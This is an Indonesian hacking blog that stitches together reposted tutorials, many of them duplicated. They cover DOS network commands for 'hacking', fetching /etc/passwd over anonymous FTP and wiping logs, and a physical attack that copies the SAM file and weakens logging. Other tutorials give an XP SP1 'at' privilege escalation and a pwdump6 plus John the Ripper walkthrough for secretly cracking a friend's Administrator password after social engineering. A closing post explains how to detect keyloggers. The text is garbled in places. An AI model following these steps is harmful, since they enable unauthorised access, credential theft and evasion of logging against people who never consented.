Selasa, 01 Nopember 05 - oleh : slackX
Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\\winxp\\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP
Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.
1. ping
2. tracert
3. telnet
4. ftp
5. netstat
OK, inilah keterangannya.
1. ping
Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.
Cobalah anda ketik perintah ini:
C:\\windows>ping/?
*************
Newbie tip: mengetik \'/?\' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don\'t Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.
Pinging chintan [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 timemput *.*
sends all files from C:\\windows to /etc
5. \'mget\' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\\windows
6. \'open\' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. \'bye\' closes the connection and quits from ftp
Untuk perintah lainnya dari ftp silakan lihat help mereka.
Sekarang pada yang port FTP (prot 21) adalah membuka www.nosecurity.com. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp www.nosecurity.com” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa www.nosecurity.com menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.
5. netstat
Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan www.target.com pada port 23 (telnet) maka port tersebut seharusnya terbuka pada www.target.com. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.
Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.
Active Connections
Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED
”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.
Sebagai contoh jika saya membuka http://www.yahoo.com maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:
\"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED\"
Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80
*************
Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************
Source: http://www.indonewbies.tk/
Thursday, December 28, 2006
serangan secara fisik
Artikel ini akan menjelaskan bagaimana caranya untuk mendapatkan akses tertinggi
dalam suatu komputer, serangan ini langsung secara fisik.
1. Membuka penutup komputer dan melepaskan baterai untuk menghapus password CMOS
(Complementari Metal Oxide Semiconductor)
2. Melakukan boot ke system dari sebuah floppy disk yang berisikan file startup agar kita
dapat memperoleh akses ke system lokal
3. Mengcopy file SAM yang berada pada file windows\\system32\\config\\sam (ini pada windows Xp\\nt)
ke floppy lalu informasi password ini dapat dicari dengan menggunakan sebuah program cracker password
4. Setelah mendapatkan password dari account administrator, masuk ke administrators dan hapus password
administrator, sekarang kamu sudah mendapat akses penuh dalam system operasi lokal
5. Mengubah level logging sehingga aktivitas kita yang mencurigakan tidak akan tercatat di log
6. Menginstal Software Sniffing sehingga aktivitas komunikasi komunikasi network bisa kita pantau
7. Menggunakan password yang sudah kita crack untuk menyerang ke system network lainya.
Anda dapat mendapatkan program cracker password dan sniffing di dalam situs situs hacker
Sekian dulu artikel dari saya semoga ini bermanfaat bagi anda
dicopy paste dari
http://www2.ukdw.ac.id/ukdwnet/?pilih=lihat&id=207
dalam suatu komputer, serangan ini langsung secara fisik.
1. Membuka penutup komputer dan melepaskan baterai untuk menghapus password CMOS
(Complementari Metal Oxide Semiconductor)
2. Melakukan boot ke system dari sebuah floppy disk yang berisikan file startup agar kita
dapat memperoleh akses ke system lokal
3. Mengcopy file SAM yang berada pada file windows\\system32\\config\\sam (ini pada windows Xp\\nt)
ke floppy lalu informasi password ini dapat dicari dengan menggunakan sebuah program cracker password
4. Setelah mendapatkan password dari account administrator, masuk ke administrators dan hapus password
administrator, sekarang kamu sudah mendapat akses penuh dalam system operasi lokal
5. Mengubah level logging sehingga aktivitas kita yang mencurigakan tidak akan tercatat di log
6. Menginstal Software Sniffing sehingga aktivitas komunikasi komunikasi network bisa kita pantau
7. Menggunakan password yang sudah kita crack untuk menyerang ke system network lainya.
Anda dapat mendapatkan program cracker password dan sniffing di dalam situs situs hacker
Sekian dulu artikel dari saya semoga ini bermanfaat bagi anda
dicopy paste dari
http://www2.ukdw.ac.id/ukdwnet/?pilih=lihat&id=207
Wednesday, December 20, 2006
kerjanya di sp 1 yang belum di patch
mengganti user limited menjadi admin
start > run > CMD
ketik
c:\at 02:40 /interactive "cmd.exe"
jika waktunya pass maka akan tampil
c:\windows\system32
lantas kita endtask explorer
dan kita buka explorer melalui
c:\windows\explorer.exe
bingo..!! kita sudah masuk ke menu admin
mudah yah..kita bisa reset password ,ganti user yang tadinya limited menjadi
admin ( sekali lagi sayang hanya bekerja di sp 1 )
start > run > CMD
ketik
c:\at 02:40 /interactive "cmd.exe"
jika waktunya pass maka akan tampil
c:\windows\system32
lantas kita endtask explorer
dan kita buka explorer melalui
c:\windows\explorer.exe
bingo..!! kita sudah masuk ke menu admin
mudah yah..kita bisa reset password ,ganti user yang tadinya limited menjadi
admin ( sekali lagi sayang hanya bekerja di sp 1 )
Suka Chatting menggunakan MSN
anda suka chatting menggunakan MSN, penyedia layanan chatting
terbesar dan juga di gandrungi banyak orang selain mirc namun
layanan gratis..tis tersebut diblok oleh admin..
G4L4G..!! inilah solusinya
http://www.easymessage.net/brands/em/setup.exe
meski belum saya coba sendiri namun nampaknya bisa anda coba
sebab di tempatku layanan tersebut tetap exis nggak di blokkir
jadi belum bisa nyoba
terbesar dan juga di gandrungi banyak orang selain mirc namun
layanan gratis..tis tersebut diblok oleh admin..
G4L4G..!! inilah solusinya
http://www.easymessage.net/brands/em/setup.exe
meski belum saya coba sendiri namun nampaknya bisa anda coba
sebab di tempatku layanan tersebut tetap exis nggak di blokkir
jadi belum bisa nyoba
PPA cara mudah mengintip password
dari pada rebet tentang artikel yang ada di bawah ini ( mengintip password admin )
lebih baik cara yang saya buat ini lebih mudah ( namun sayang ,sekali lagi sayang hanya bisa berjalan di user setara admin , jika limited tetap tidak bisa
yah ppa jamunya dapat anda download di www.elcomsoft.com
lebih mudah namun hasilnya..JOssss
lebih baik cara yang saya buat ini lebih mudah ( namun sayang ,sekali lagi sayang hanya bisa berjalan di user setara admin , jika limited tetap tidak bisa
yah ppa jamunya dapat anda download di www.elcomsoft.com
lebih mudah namun hasilnya..JOssss
Hacking Password Windows XP SP2 Administrator
Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain ( http://www.oxid.it/cain.html ), L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 ( http://www.foofus.net/fizzgig/pwdump ) dan john the ripper ( http://www.openwall.com/john ). Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi .
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey ( http://studenti.unina.it/~ncuomo/syskey ) untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.
Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :
pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.
A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file
Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.
Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari ini ( http://www.foofus.net/fizzgig/pwdump/pwdump6-1.4.3.zip ).
1. Jalankan CMD (Run->cmd)
2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini ( http://www.openwall.com/john/e/john171w.zip ). Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!
Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Referensi :
[1]. http://studenti.unina.it/~ncuomo/syskey
Thanks to fizzgig for you great tools, pwdump6 (http://www.foofus.net/fizzgig/pwdump)! I’ve been looking for this tools for a log time ago! Thanks dude!! and Thanks to pen-test@securityfocus.com!
Sumber :
chaidir.wordpress.com
_________________
Website : http://www.yogyafree.net
Mailing list : http://milis.yogyafree.net / http://groups.yahoo.com/group/yogyafree
Channel : #yogyafree DALnet
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey ( http://studenti.unina.it/~ncuomo/syskey ) untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.
Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :
pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.
A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file
Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.
Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari ini ( http://www.foofus.net/fizzgig/pwdump/pwdump6-1.4.3.zip ).
1. Jalankan CMD (Run->cmd)
2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini ( http://www.openwall.com/john/e/john171w.zip ). Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user “coba” adalah “mudahditebak”!!
Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Referensi :
[1]. http://studenti.unina.it/~ncuomo/syskey
Thanks to fizzgig for you great tools, pwdump6 (http://www.foofus.net/fizzgig/pwdump)! I’ve been looking for this tools for a log time ago! Thanks dude!! and Thanks to pen-test@securityfocus.com!
Sumber :
chaidir.wordpress.com
_________________
Website : http://www.yogyafree.net
Mailing list : http://milis.yogyafree.net / http://groups.yahoo.com/group/yogyafree
Channel : #yogyafree DALnet
bahaya keyloger
terpaksa aku post tentang keylogger
Pernahkah anda mendengar istilah keylogger ? tahukah anda apa itu key logger ? serta bahayanya dan cara mengatasinya ? jika sudah, JANGAN lanjutkan membaca tulisan ini :P...!!!
Keylogger adalah program spy.. ia akan mencatat segala aktivitas yang kita lakukan di suatu komputer dan menyimpan semua informasi kedalam log file. Bekerja dengan mendeteksi signal keyboard yang kita tekan. Awal mulanya program ini ditujukan bagi orang tua agar bisa mengontrol aktifitas anak2 mereka di komputer. Namun, oleh sebagian orang yang tidak bertanggung jawab, program ini digunakan untuk memata2i dan mencuri informasi2 yang mungkin penting untuk mereka (password email, nick, channel irc, dll). Saya kira cukup pengantarnya.
Pertanyaan pun muncul.. Bagai mana saya mengetahui di suatu komputer ada key loggernya?(di OS under windows, karena warnet2 sebagian besar menggunakan ms windows untuk client)
Jawabannya adalah dengan membuka file2 registrasi.. Sebagai contoh (dan memang mudah dilihat) msconfig.exe (start --> run --> msconfig) maka akan muncul menu "system Configuration Utility" click menu "startup" secara default akan muncul 5-6 item yaitu
1. scanregistry
2. TaskMonitor
3. System tray
4. load power profile
5. schedulingAgen
Jika ada tambahan seperti c-media mixer yach itu hanya tambahan dari souncard.. Namun, jika ada yang terasa mencurigakan maka ada baiknya anda menduga itu adalah item keylogger (contoh: TIKL, rapid blaster, ed blaster).
Kalo ada file2 yang mencurigakan, apa yang harus saya lakukan ? jawabannya adalah terserah and :P. Asal jangan diambil memory ama harddisk nya ajah heheheehhee (JK). Saran saya jika ada file-file "HARAM" tersebut maka jika anda gak ngerti mengatasinnya, sebaiknya anda tinggalkan komputer itu, lapor ama operator and minta di hapus itu file.
Tapi ada baiknya anda melacak file2 tersebut untuk kemudian anda hilangkan. Sebagai contoh "TIKL" secara default tersimpan di system windows maka cari file tersebut dan delete semua nama file tersebut (file log nya pasti sama dengan aplikasinya jika bingung yach ikuti saran pertama :P) dengan demikian akan sedikit mengurangi bahaya "bocornya" informasi penting yang tercuri ama orang laen (coba bayangkan kalo kita sedang cyber S*X trus kecatat khan malu kekekekeke :P)
Pesan saya kepada Operator warnet
Jaga keamanan client anda (polisi kali.. hehehe) jangan sampai user merasa tidak aman dan akhirnya meninggalkan warnet anda (khan bangkrut) cara yang efektif yang saya tahu sekarang ini adalah dengan menggunakan 2 kombinasi program yaitu "GOBACK" dan "FOLDER GUARD" "keterangan lebih lanjut silakan baca manualnya"
USER
Jika anda mengakses situs2 penting (klikbca misalnya) sebaiknya jangan diwarnet . Ini untuk meminimalisasi kemungkinan buruk yang akan terjadi.
Pemasang program "HARAM"
Memasang program2 "haram" adalah sangat "memalukan" mending anda ngemis deh ama yang punya sapa tahu dikasih khan untung loe :P...jangan hanya karena anda men "TO" email, atau nick, atau channel irc lantas anda dengan "bangga" mengatakan "AKU SEORANG HACKER" maka "sambil mengacungkan jari tengah" saya katakan anda LAMERZ... baca dul udech
Artikel2 tentang hacker..
akhirnya.. banyak pekerjaan IT khususnya Internet yang bisa kita dalami. Menjadi seorang "penjahat" bukanlah pekerjaan yang "enak" anda bakalan dimusuhi banyak orang (emang enak)
VIVA dalnet#asiahacker
tulisan ini juga untuk pak kukkuk dalam rangka memperingati satu tahun meninggalnya anak dan istrinya (semoga diterima disisinya aminnnn)
wassalam
Pernahkah anda mendengar istilah keylogger ? tahukah anda apa itu key logger ? serta bahayanya dan cara mengatasinya ? jika sudah, JANGAN lanjutkan membaca tulisan ini :P...!!!
Keylogger adalah program spy.. ia akan mencatat segala aktivitas yang kita lakukan di suatu komputer dan menyimpan semua informasi kedalam log file. Bekerja dengan mendeteksi signal keyboard yang kita tekan. Awal mulanya program ini ditujukan bagi orang tua agar bisa mengontrol aktifitas anak2 mereka di komputer. Namun, oleh sebagian orang yang tidak bertanggung jawab, program ini digunakan untuk memata2i dan mencuri informasi2 yang mungkin penting untuk mereka (password email, nick, channel irc, dll). Saya kira cukup pengantarnya.
Pertanyaan pun muncul.. Bagai mana saya mengetahui di suatu komputer ada key loggernya?(di OS under windows, karena warnet2 sebagian besar menggunakan ms windows untuk client)
Jawabannya adalah dengan membuka file2 registrasi.. Sebagai contoh (dan memang mudah dilihat) msconfig.exe (start --> run --> msconfig) maka akan muncul menu "system Configuration Utility" click menu "startup" secara default akan muncul 5-6 item yaitu
1. scanregistry
2. TaskMonitor
3. System tray
4. load power profile
5. schedulingAgen
Jika ada tambahan seperti c-media mixer yach itu hanya tambahan dari souncard.. Namun, jika ada yang terasa mencurigakan maka ada baiknya anda menduga itu adalah item keylogger (contoh: TIKL, rapid blaster, ed blaster).
Kalo ada file2 yang mencurigakan, apa yang harus saya lakukan ? jawabannya adalah terserah and :P. Asal jangan diambil memory ama harddisk nya ajah heheheehhee (JK). Saran saya jika ada file-file "HARAM" tersebut maka jika anda gak ngerti mengatasinnya, sebaiknya anda tinggalkan komputer itu, lapor ama operator and minta di hapus itu file.
Tapi ada baiknya anda melacak file2 tersebut untuk kemudian anda hilangkan. Sebagai contoh "TIKL" secara default tersimpan di system windows maka cari file tersebut dan delete semua nama file tersebut (file log nya pasti sama dengan aplikasinya jika bingung yach ikuti saran pertama :P) dengan demikian akan sedikit mengurangi bahaya "bocornya" informasi penting yang tercuri ama orang laen (coba bayangkan kalo kita sedang cyber S*X trus kecatat khan malu kekekekeke :P)
Pesan saya kepada Operator warnet
Jaga keamanan client anda (polisi kali.. hehehe) jangan sampai user merasa tidak aman dan akhirnya meninggalkan warnet anda (khan bangkrut) cara yang efektif yang saya tahu sekarang ini adalah dengan menggunakan 2 kombinasi program yaitu "GOBACK" dan "FOLDER GUARD" "keterangan lebih lanjut silakan baca manualnya"
USER
